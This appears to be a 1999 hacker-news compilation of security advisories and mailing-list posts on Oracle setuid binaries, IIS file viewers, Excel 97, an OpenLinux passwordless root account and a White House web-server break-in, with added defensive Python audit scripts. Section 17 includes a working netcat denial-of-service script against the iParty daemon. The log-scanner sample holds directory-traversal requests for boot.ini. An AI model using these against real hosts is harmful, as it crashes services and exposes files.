Q: I've heard about a setuid security issue with the Oracle database. What
is this all about?
A: On Unix platforms, some executable files have the setuid bit on. It may
be possible for a very knowledgeable user to use these executables to bypass
your system security by elevating their operating system privileges to that
of the Oracle user.


Q: Which releases are affected by this problem?
A: This problem affects Oracle data server releases 8.03, 8.0.4, 8.0.5, and
8.1.5 on Unix platforms only.


Q: Can I correct this problem or do I need a patch?
A: This problem can easily be corrected. The customer can download the patch
from the Oracle MetaLink webpages at http://www.oracle.com/support/elec_sup.
The patch is a Unix shell script. This shell script should be run
immediately, and also run after each relink of Oracle.


Q: What is Oracle doing to fix this problem?
A: Effective immediately, Oracle will provide the patch on Oracle's
Worldwide Support Web pages. Oracle will ensure the patches are incorporated
into future releases of Oracle8i (8.1.6) and Oracle8.0 (8.0.6).


Q: What is Oracle doing to notify users about this problem now?
A: Oracle is notifying all supported customers, via the Oracle Worldwide
Support Web pages, of this issue so they can address it as required.


ISS X-Force also recommends that all administrators complete a proactive
survey on the use or potential misuse of setuid bits on privileged
executables on their systems.
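The proactive survey ISS recommends, as an added Python example (not ISS's code): walk a tree,
report every regular file carrying the setuid or setgid bit with its owner and mode, and flag
any that sit in a world-writable, non-sticky directory. demo() builds a constructed tree in a
temporary directory so the function can be exercised without touching a real installation;
on a live system you would point survey_setuid() at $ORACLE_HOME or at / instead:

```python
# Added example, not from the ISS advisory.
import grp
import os
import pwd
import stat
import tempfile


def _lookup(func, key):
    """Resolve a uid/gid to a name, falling back to the number if it is unknown."""
    try:
        return func(key)
    except KeyError:
        return str(key)


def survey_setuid(root):
    """Report regular files under `root` that have the setuid or setgid bit set."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        dir_mode = os.stat(dirpath).st_mode
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks while surveying
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue
            findings.append({
                "path": path,
                "mode": oct(stat.S_IMODE(st.st_mode)),
                "owner": _lookup(lambda u: pwd.getpwuid(u).pw_name, st.st_uid),
                "group": _lookup(lambda g: grp.getgrgid(g).gr_name, st.st_gid),
                "setuid": bool(st.st_mode & stat.S_ISUID),
                "setgid": bool(st.st_mode & stat.S_ISGID),
                # A privileged binary in a world-writable directory without the sticky
                # bit can be replaced by any local user; call that out separately.
                "dir_world_writable": bool(dir_mode & stat.S_IWOTH)
                                      and not dir_mode & stat.S_ISVTX,
            })
    return sorted(findings, key=lambda f: f["path"])


def demo():
    """Constructed tree: one setuid tool and one ordinary tool under bin/."""
    with tempfile.TemporaryDirectory() as d:
        bindir = os.path.join(d, "bin")
        os.mkdir(bindir)
        for name, mode in (("suid_tool", 0o4755), ("plain_tool", 0o755)):
            path = os.path.join(bindir, name)
            open(path, "w").close()
            os.chmod(path, mode)
        return [os.path.basename(f["path"]) for f in survey_setuid(d)]


if __name__ == "__main__":
    print(demo())
```

Run periodically and diffed against a known-good baseline, the output doubles as a detection:
a setuid file that was not there last week is worth a look whatever owns it.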


Credits:


These vulnerabilities were primarily researched by Dan Ingevaldson of the
ISS X-Force.


________


Copyright (c) 1999 by Internet Security Systems, Inc. Permission is
hereby granted for the electronic redistribution of this Security Alert.
It is not to be edited in any way without express consent of the X-Force.
If you wish to reprint the whole or any part of this Alert Summary in any
other medium excluding electronic medium, please e-mail xforce@iss.net for
permission.


About ISS
ISS is the pioneer and leading provider of adaptive network security
software delivering enterprise-wide information protection solutions. ISS'
award-winning SAFEsuite family of products enables information risk
management within intranet, extranet and electronic commerce environments.
By combining proactive vulnerability detection with real-time intrusion
detection and response, ISS' adaptive security approach creates a flexible
cycle of continuous security improvement, including security policy
implementation and enforcement. ISS SAFEsuite solutions strengthen the
security of existing systems and have dramatically improved the security
posture for organizations worldwide, making ISS a trusted security advisor
for firms in the Global 2000, 21 of the 25 largest U.S. commercial banks
and over 35 governmental agencies. For more information, call ISS at
678-443-6000 or 800-776-2362 or visit the ISS Web site at www.iss.net.


Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties with regard to this information. In no event shall the
author be liable for any damages whatsoever arising out of or in
connection with the use or spread of this information. Any use of this
information is at the user's own risk.


X-Force PGP Key available at: http://www.iss.net/xforce/sensitive.html
as well as on MIT's PGP key server and PGP.com's key server.


Please send suggestions, updates, and comments to:
X-Force <xforce@iss.net> of Internet Security Systems, Inc.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv


iQCVAwUBNzLwJzRfJiV99eG9AQFDHwP/U4iParVoaPwPea8i+mXciMELGUDga2UM
Iyk6T6poQ9G3ASefs+v6Lm509xDeGCcPTi1MB7SvzUBb1vx95yOhu4M9CJHWOTCJ
3/ZlpV1Zdc7s/+N0ACxFNPozOmQvpT3OhbJKOakNQxDg3q/VbVXcJOxJ0DBKy7Xe
d0ehW7p2OqQ=
=6FXz
-----END PGP SIGNATURE-----

@HWA

16.0 Microsoft Security Bulletin: File viewers vulnerability (MS99-13)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Microsoft Security Bulletin (MS99-013)
--------------------------------------


Solution Available for File Viewers Vulnerability


Originally Posted: May 7, 1999


Summary
=======
Microsoft has identified a vulnerability that occurs in some file viewers
that ship as part of Microsoft (r) Internet Information Server and Site
Server. The vulnerability could allow a web site visitor to view, but not to
change, files on the server, provided that they knew or guessed the name of
each file and had access rights to it based on Windows NT ACLs.


Microsoft is releasing this security bulletin to inform customers of the
vulnerability and enable them to eliminate it immediately. Patches are being
developed for the affected file viewers, and will be available shortly. When
they are available, an update to this security bulletin will be released.


Issue
=====
Microsoft Site Server and Internet Information Server include tools that
allow web site visitors to view selected files on the server. These are
installed by default under Site Server, but must be explicitly installed
under IIS. These tools are provided to allow users to view the source code
of sample files as a learning exercise, and are not intended to be deployed
on production web servers. The underlying problem in this vulnerability is
that the tools do not restrict which files a web site visitor can view.


Several points are important to note:
- These file viewers are not installed by default under IIS.
They are only installed under IIS if the user chooses to install
the sample web files.
- This vulnerability only allows a web site visitor to view files.
There is no capability through this vulnerability to change files
or add files to the server.
- This vulnerability does not in any way bypass the Windows NT file
permission ACLs. A web site visitor could only use these tools to
view files whose ACLs allows them read access. The administrator of
the web server determines the specific permissions for all files on
the server.
- The viewers can only be used to view files on the same disk partition
as the currently-displayed web page. Databases such as those used by
e-commerce servers are typically stored on a different physical drive,
and these would not be at risk.
- The web site visitor would need to know or guess the name of each file
they wished to view.


Specific steps that customers can take to immediately eliminate the
vulnerability are discussed below in What Customers Should Do. In addition,
Microsoft is developing updated versions of the file viewers and will
release them shortly.


While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing this bulletin to allow
customers to take appropriate action to protect themselves against it.


Affected Software Versions
==========================
- Microsoft Site Server 3.0, which is included with Microsoft Site
Server 3.0 Commerce Edition, Microsoft Commercial Internet
System 2.0, and Microsoft BackOffice Server 4.0 and 4.5
- Microsoft Internet Information Server 4.0


What Microsoft is Doing
=======================
Microsoft has provided this bulletin to inform customers of specific steps
that they can take to immediately eliminate this vulnerability on their
servers. Microsoft is developing updated file viewers that fix the problem
identified, and will release an updated version of this bulletin when they
are available.


Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.


Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.
(Note: It might take 24 hours from the original posting of this
bulletin for the KB article to be visible in the Web-based
Knowledge Base.)


What Customers Should Do
========================
Customers should take the following steps to eliminate the vulnerability on
their web servers:
- Unless the affected file viewers are specifically required on the
web site, they should be removed. The following file viewers are
affected: ViewCode.asp, ShowCode.asp, CodeBrws.asp and Winmsdp.exe.
Depending on the specific installation, not all of these files may
be present on a server. Likewise, there may be multiple copies of
some files, so customers should do a full search of their servers
to locate all copies.
- In accordance with standard security guidelines, file permissions
should always be set to enable web visitors to access only the files
they need, and no others. Moreover, files that are needed by web
visitors should provide the least privilege needed; for example,
files that web visitors need to be able to read but not write should
be set to read-only.
- As a general rule, sample files and vroots should always be deleted
from a web server prior to putting it into production. If they are
needed, file access permissions should be used to regulate access to
them as appropriate.
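Removing the viewers is the fix; checking whether anyone reached them first is the other half.
As an added Python example (not Microsoft's code), the function below reads IIS W3C extended
log lines, picks out requests for the four viewers the bulletin names, and rates a request as a
traversal attempt when its decoded query contains a '..' segment. The log lines are constructed
for this example and use the showcode.asp path from the L0pht advisory above; the codebrws.asp
path in them is made up:

```python
# Added example, not from the Microsoft bulletin.
import re
from urllib.parse import unquote

# The four file viewers MS99-013 names, compared case-insensitively.
VIEWERS = ("viewcode.asp", "showcode.asp", "codebrws.asp", "winmsdp.exe")

# A '..' path segment, with either separator, anywhere in the decoded query.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

# Constructed sample in the W3C extended format; IIS writes '-' for an empty field.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
1999-05-08 10:11:34 192.0.2.10 GET /default.asp - 200
1999-05-08 10:12:01 192.0.2.10 GET /msadc/Samples/SELECTOR/showcode.asp source=/msadc/Samples/SELECTOR/showcode.asp 200
1999-05-08 10:12:05 192.0.2.77 GET /msadc/Samples/SELECTOR/showcode.asp source=/msadc/Samples/../../../../../boot.ini 200
1999-05-08 10:13:40 192.0.2.77 GET /samples/CodeBrws.asp source=/samples/..%2F..%2Fboot.ini 200
1999-05-08 10:14:02 192.0.2.12 GET /products/list.asp id=42 200
"""


def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_viewer_requests(text):
    """Return every request that hit one of the viewers, rated by what it asked for."""
    findings = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"]
        if stem.rsplit("/", 1)[-1].lower() not in VIEWERS:
            continue
        raw = rec.get("cs-uri-query", "-")
        query = unquote(raw) if raw != "-" else ""   # decode %2F and friends before matching
        severity = "traversal" if TRAVERSAL.search(query) else "viewer-access"
        findings.append({"ip": rec["c-ip"], "stem": stem, "query": query,
                         "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_viewer_requests(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["stem"], f["query"])
```

Any hit at all on a production server means a viewer is still installed; the traversal-rated
ones are the requests to follow up on, and the client address groups them.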


More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Solution Available for File Viewers Vulnerability
(The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231368,
Solution Available for File Viewers Vulnerability,
http://support.microsoft.com/support/kb/articles/q231/3/68.asp.


Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.


Acknowledgments
===============
Microsoft acknowledges WebTrends (www.webtrends.com) for discovering this
vulnerability and reporting it to us.


Revisions
=========
- May 07, 1999: Bulletin Created.


For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security



--------------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

17.0 iParty pooper
~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Received: from hotmail.com (law2-f15.hotmail.com [216.32.181.15]) by
netspace.org (8.8.7/8.8.7) with SMTP id NAA20477 for
<bugtraq@netspace.org>; Sat, 8 May 1999 13:10:37 -0400
Received: (qmail 46545 invoked by uid 0); 8 May 1999 17:11:35 -0000
Received: from 142.169.181.31 by www.hotmail.com with HTTP; Sat, 08 May 1999
10:11:34 PDT
X-Originating-IP: [142.169.181.31]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_e6987ad_6338d761$45c2e550"
Message-ID: <19990508171135.46544.qmail@hotmail.com>
Date: Sat, 8 May 1999 13:11:34 EDT
Reply-To: wh00t X <bugtraq2@HOTMAIL.COM>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: wh00t X <bugtraq2@HOTMAIL.COM>
Subject: iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)
X-cc: jaldrich@bumpkinland.com, packetstorm@genocide2600.com
To: BUGTRAQ@netspace.org


Content-type: text/plain; format=flowed;


Hi,


iParty, by Intel Experimental Technologies Department, (unofficial
information source at http://www.bumpkinland.com/iparty/), is a small voice
conferencing program, which includes a server daemon in the download. It is
handy for quick internet voice chat, but the server can be killed by sending
a large amount of extended characters to the server port, which is 6004 by
default, without being logged. The daemon either crashes quietly or GPF
(varies from box to box).
I've been told an advisory of some sort has already been released for
this particular vulnerability but I believe the matter needs further
attention because:


1. While there are other newer and better voice conferencing programs out,
iParty continues to be widely used.
2. This vulnerability may be worse than thought: I tested my program
(attached to message) against 4 random Windows 95/98 boxes with the daemon
running, and after 2 or 3 crashes in a row, on top of crashing the iParty
daemon, some experienced disconnection from the internet, ICQ and/or
Rnaapp.exe, and one was even forced to reboot after the Rnaapp.exe crash.


Thanks,
Ka-wh00t



_______________________________________________________________
Get Free Email and Do More On The Web. Visit http://www.msn.com

Content-Type: text/plain; name="ippooper.sh"
Content-Disposition: attachment; filename="ippooper.sh"
X-MIME-Autoconverted: from 8bit to quoted-printable by smv18.iname.net id SAA23880


ippooper.sh

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortunately, the daemon that's included in the iParty download can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.


if [ "$1" = "" ]; then
    echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
    echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
    echo "Maybe you'll get lucky."
    echo ""
    echo "Usage: $0 <hostname/ip> <port>"
    echo "Port is probably 6004 (default port)."
    echo ""
    echo "Remember: You need netcat for this program to work."
    echo "If you see something similar to 'nc: command not found', get netcat."
else
    if [ "$2" = "" ]; then
        echo "I said the port is probably 6004, try that."
        exit
    else
        rm -f ipp00p
        cat > ipp00p << _EOF_
$6ì]}tTÕµ?"̐aœp/˜HÔD†0iAá½L%Ï̂EBEԁð'*}ÒyÓÔ¥(3êz‹nÃuèԏj+¨°(֗քd'‰™øZiXåËy7 ¡'``྽ϝ Cµ¶ïüÖʹçî³ÏÞçì½Ï>çܐE¢6‡â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=o¨§ „8ÂӁ'L5"ïé²±žá¤¸DRGÒIôlq„Y­g›»ÒiƒÆiÕ¾ëH¹H„w‹òá½²»Ô3ðlŽš*oÎ#ésC9m,

_EOF_
        echo ""
        echo "Sending kill..."
        cat ipp00p | nc $1 $2
        echo "Done."
        rm -f ipp00p
    fi
fi


@HWA

18.0 Microsoft Security Advisory Bulletin: Excel 97 virus patch (MS99-14)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is a Security Bulletin from the Microsoft Product Security
Notification Service.


Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************


Microsoft Security Bulletin (MS99-014)
--------------------------------------


Patch Available for Excel 97 Virus Warning Vulnerabilities


Originally Posted: May 7, 1999


Summary
=======
Microsoft has released a patch that eliminates vulnerabilities in the Excel
97 virus warning mechanism. The patch is fully supported, and Microsoft
recommends that affected customers download and install it, if appropriate.


Issue
=====
Microsoft Excel 97 provides a feature that warns the user before launching
an external file that could potentially contain a virus or other malicious
software. This feature allows the user to weigh the risk of opening the
file, based on its origin, the network it is located on and the security
practices in operation there, the sensitivity of the data on the user's
computer, and other factors.


However, certain scenarios have been identified that could be misused to
bypass the warning mechanism. In general, they require the use of
infrequently-combined features and commands, and are unlikely to be
encountered in normal use. This patch addresses these issues so that they
cannot be taken advantage of by a malicious user.


While there are no reports of customers being adversely affected by any of
the vulnerabilities eliminated by the patch, Microsoft is proactively
releasing the patch to allow customers to take appropriate action to protect
themselves against it. These fixes are already built into Excel 2000 and
users of that product will not need to download this patch.


Affected Software Versions
==========================
- Microsoft Excel 97


What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.


Microsoft also has sent this security bulletin to customers subscribing
to the Microsoft Product Security Notification Service. See
http://www.microsoft.com/security/services/bulletin.asp for more
information about this free customer service.


Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.
(Note: It might take 24 hours from the original posting of this bulletin
for the KB article to be visible in the Web-based Knowledge Base.)


What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that
this vulnerability poses to their systems and determine whether to download
and install the patch. The patch can be found at:
- http://officeupdate.microsoft.com/downloaddetails/xl8p6pkg.htm


More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-013,
Patch Available for Excel 97 Virus Warning Vulnerabilities
(the Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-013.asp.
- Microsoft Knowledge Base (KB) article Q231304,
Patch Available for Excel 97 Virus Warning Vulnerabilities,
http://support.microsoft.com/support/kb/articles/q231/3/04.asp.


Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please contact
Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.


Revisions
=========
- May 7, 1999: Bulletin Created.



For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security



--------------------------------------------------------------------


THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.


(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.


*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.


For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.

@HWA

19.0 LISA install leaves root access: Openlinux 2.2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

X-From_: linux-security-request@redhat.com Sun May 9 05:45:16 1999
Date: Sat, 8 May 1999 23:46:40 -0400 (EDT)
From: Andrew McRory <amacc@mailer.org>
X-Sender: amacc@ns1.mailer.org
To: linux-security@redhat.com
cc: bugtraq@netspace.org
Message-ID: <Pine.LNX.4.02.9905082300390.13930-100000@ns1.mailer.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-moderate: yes
Subject: [linux-security] OpenLinux 2.2: LISA install leaves root access without password



Hello,


I believe I've found a bug in the installation process of OpenLinux 2.2
when using the LISA boot disk. During the installation a temporary passwd
file is put on the new file system containing the user "help" set uid=0
gid=0 and no password. Once you are prompted to set the root password and
default user password a new passwd and shadow file is created yet the help
user is left in the shadow file with, you guessed it, no password... Here
are the offending entries:


/etc/passwd
help:x:0:0:install help user:/:/bin/bash


/etc/shadow
help::10709:0:365:7:7::


Anyone who installed OpenLinux 2.2 using the LISA boot disk should check
their password file now ;-)


I found this using a cdrom I made from a mirror of the mirror at
ftp.tux.org. Just to make sure I wasn't mixed up I redownloaded the
install.144 file from ftp.calderasystems.com and tried again. Same thing.
The install disk is version 137 dated 26Mar99 (displayed on the boot
message).


I wrote Caldera a message late in the day Friday regarding this bug but
haven't heard back from anyone. I've tried to resist posting this until I
hear back but I really feel people should know now!!


PS: I'm not sure if Lizard, the graphical installation method, has this
problem. It crashes before it does much here.... that's why I tried LISA.


Thanks,




Andrew McRory - amacc@linuxsys.com ***********************************
Linux Systems Engineers / The PC Doctors *
3009-C West Tharpe Street - Tallahassee, FL 32303 *
Voice 850.575.7213 ***************************************************


--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------


To unsubscribe:
mail -s unsubscribe linux-security-request@redhat.com < /dev/null
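The check the post asks readers to make, as an added Python example (not from the post or from
Caldera): audit_accounts() reads passwd and shadow content and flags any account with uid 0 other
than root and any account whose effective password field is empty, which is exactly the pair of
conditions the two quoted entries show. The sample files below are constructed around those two
entries, with placeholder hashes for the other accounts:

```python
# Added example, not from the post or from Caldera's installer.

# Constructed sample: the two 'help' lines are the ones quoted in the post; the rest is made up.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
help:x:0:0:install help user:/:/bin/bash
col:x:100:100:Col User:/home/col:/bin/bash
"""

SAMPLE_SHADOW = """\
root:PLACEHOLDER_HASH:10709:0:99999:7:::
help::10709:0:365:7:7::
col:PLACEHOLDER_HASH:10709:0:99999:7:::
"""


def parse_colon_file(text):
    """Yield the colon-separated fields of each non-blank, non-comment line."""
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            yield line.split(":")


def audit_accounts(passwd_text, shadow_text=""):
    """Return (account, problem) pairs for extra uid-0 accounts and empty passwords.

    An 'x' in the passwd password field defers to the shadow entry; any other value
    (including an empty one) is the password field itself.
    """
    shadow = {fields[0]: fields[1] for fields in parse_colon_file(shadow_text)
              if len(fields) >= 2}
    findings = []
    for fields in parse_colon_file(passwd_text):
        if len(fields) < 4:
            continue
        name, password, uid = fields[0], fields[1], fields[2].strip()
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if password == "x":
            if name not in shadow:
                findings.append((name, "passwd defers to shadow but no shadow entry exists"))
                continue
            effective = shadow[name]
        else:
            effective = password
        # Locked markers such as '*' or '!' are not empty; only "" allows login without a password.
        if effective == "":
            findings.append((name, "empty password field (login without a password)"))
    return findings


def audit_system(passwd_path="/etc/passwd", shadow_path="/etc/shadow"):
    """Run the audit over the live files; reading /etc/shadow needs root."""
    with open(passwd_path) as p, open(shadow_path) as s:
        return audit_accounts(p.read(), s.read())


if __name__ == "__main__":
    for account, problem in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account}: {problem}")
```

On an affected install the 'help' line is reported twice, once for each condition; a locked
account (password field '*' or '!') produces nothing, and a passwd entry with an empty field and
no shadow file at all is still caught.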

@HWA

20.0 BUGTRAQ receives a plaque at SANS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 08:46:48 -0700
Reply-To: Aleph One <aleph1@UNDERGROUND.ORG>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Aleph One <aleph1@UNDERGROUND.ORG>
Subject: Adminisrivia
To: BUGTRAQ@netspace.org


The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
a plaque during the SANS conference now happening at Baltimore for being
one of the three most valuable security publications. This is in response
to a survey they did at an earlier conference. I'd like to thank SANS
for the gesture. Although I accepted the plaque it is really for all of
you. Cheers.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01


Approved-By: aleph1@UNDERGROUND.ORG
Date: Mon, 10 May 1999 12:52:22 -0400
Reply-To: Brian Fisk <bfisk@netspace.org>
Sender: Bugtraq List <BUGTRAQ@netspace.org>
From: Brian Fisk <bfisk@netspace.org>
Subject: Re: Adminisrivia
To: BUGTRAQ@netspace.org
In-Reply-To: <19990510084648.C29946@underground.org>


I would also like to thank the SANS Institute on behalf of NetSpace, as
they also donated a sizable chunk of money for a mail server upgrade as
part of the same award. This donation, combined with other donations from
the Bugtraq community in the past allowed us to double (or potentially
even more) our mail delivery capacity for this list as well as all the
others that NetSpace serves. Thanks to everyone here who makes this list
what it is.


Brian Fisk
NetSpace Administrator


On Mon, 10 May 1999, Aleph One wrote:


> The SANS Institute (http://www.sans.org/) has graciously given Bugtraq
> a plaque during the SANS conference now happening at Baltimore for being
> one of the three most valuable security publications. This is in response
> to a survey they did at an earlier conference. I'd like to thank SANS
> for the gesture. Although I accepted the plaque it is really for all of
> you. Cheers.
>
> --
> Aleph One / aleph1@underground.org
> http://underground.org/
> KeyID 1024/948FD6B5
> Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
>


--
Brian Fisk bfisk@netspace.org




@HWA

21.0 White House takes server offline
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

White House Takes Server Offline


contributed by Weld Pond
In order to conduct an "Administrative Review" the White House took its web server offline and
also closed off all e-mail to and from the outside world. This comes after what HNN believes
to be a successful crack of the www1. server at 8:50am EST Monday morning. This crack was
_not_ related to other recent .gov/.mil cracks nor was this crack strongly related to the
Chinese embassy bombing or had any other political motives. Other mainstream news outlets
are getting their stories confused. (If you only read one of these articles I recommend the
one by Brock Meeks of MSNBC, it seems to be the most thorough.)

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html
MSNBC
http://www.msnbc.com/news/268339.asp
Heise.de
http://www.heise.de/newsticker/data/fr-11.05.99-000/
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/whhack990511.html
C|Net
http://www.news.com/News/Item/0,4,36431,00.html?st.ne.fd.mdh.ni
CNN
http://www.cnn.com/TECH/computing/9905/12/white.house.site.01/index.html
Nando Times
http://www.techserver.com/story/body/0,1634,47750-77011-550124-0,00.html

MSNBC

White House Web site shut down
Purported attacker says there was no political motive
By Brock N. Meeks and Alan Boyle
MSNBC

WASHINGTON, May 11 - The White House shut down its public Web site for more than 24 hours
because of computer attacks, a spokesman said Tuesday. Government Web sites have sustained
a wave of assaults apparently aimed at protesting last week’s NATO bombing of the Chinese
Embassy in Belgrade. However, in an interview with MSNBC, a computer user who claimed a
role in the White House Web break-in denied that there was a political motive.

"AN ATTEMPT was made to break into the system that operates the Web page yesterday morning,"
White House spokesman Barry Toiv told MSNBC Tuesday, "and so what we’ve done is use existing
procedures to limit access to the system so we could make a full assessment." The Web site was
back in operation by Wednesday morning.

Computer attacks on government Web sites have taken on a higher profile in the wake of Friday’s
embassy bombing, which left three dead and 20 injured. The bombing, which NATO said was due to an
intelligence error, sparked a wave of demonstrations at the U.S. Embassy in Beijing, as well as
widespread criticism online and offline.

